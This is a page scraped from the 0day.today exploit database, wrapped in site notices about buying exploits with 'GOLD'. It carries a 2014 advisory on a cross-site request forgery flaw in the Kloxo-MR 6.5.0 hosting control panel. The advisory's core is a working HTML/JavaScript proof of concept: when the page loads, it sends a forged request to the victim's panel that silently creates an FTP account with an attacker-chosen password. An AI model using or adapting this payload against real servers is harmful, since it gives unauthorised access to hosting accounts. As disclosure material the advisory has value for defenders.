0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Kloxo-MR 6.5.0 - CSRF Vulnerability

Author

Necmettin

Risk

[

Security Risk Low

]

0day-ID

Category

Date add

Platform

# Exploit Title     :Kloxo-MR 6.5.0 CSRF Vulnerability
# Vendor Homepage   :https://github.com/mustafaramadhan/kloxo/tree/dev
# Version   :Kloxo-MR 6.5.0.f-2014020301
# Tested on         :Centos 6.4
# Exploit Author    :Necmettin COSKUN =>@babayarisi
# Blog              :http://www.ncoskun.com http://www.grisapka.org
# Discovery date    :03/12/2014
# CVE               :N/A
  
Kloxo-MR is special edition (fork) of Kloxo with many features not existing on Kloxo official release (6.1.12+).
This fork named as Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan').
================
CSRF Vulnerability
  
Vulnerability
================
Kloxo-MR has lots of POST and GET based form applications like Kloxo stable , some inputs escaped from specialchars but inputs dont have any csrf protection or secret key
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.
 
Poc Exploit
================
 
 <html>
 <head><title>Kloxo-MR demo</title></head>
 <script type="text/javascript">
 function yurudi(){
        ///////////////////////////////////////////////////////////
        //Kloxo-MR 6.5.0  CSRF Vulnerability         //
        //Author:Necmettin COSKUN => twitter.com/@babayarisi  //
        //Blog: http://www.ncoskun.com | http://www.grisapka.org //
        ///////////////////////////////////////////////////////////
        //Remote host
        var host="victim.com"; 
        //New Ftp Username
        var username="demouser";
        //New Ftp Password
        var pass="12345678";
        //This creates new folder under admin dir. /admin/yourfolder
        var dir="demodirectory";
        //If necessary only modify http to https ;)
        var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
 
        document.getElementById('demoexploit').src=urlson;
}
 </script>
 <body onload="yurudi();">
 <img id="demoexploit" src=""></img>
 </body>
 </html>
  
  
Discovered by:
================
Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Kloxo-MR 6.5.0 - CSRF Vulnerability

Report Error

Report Error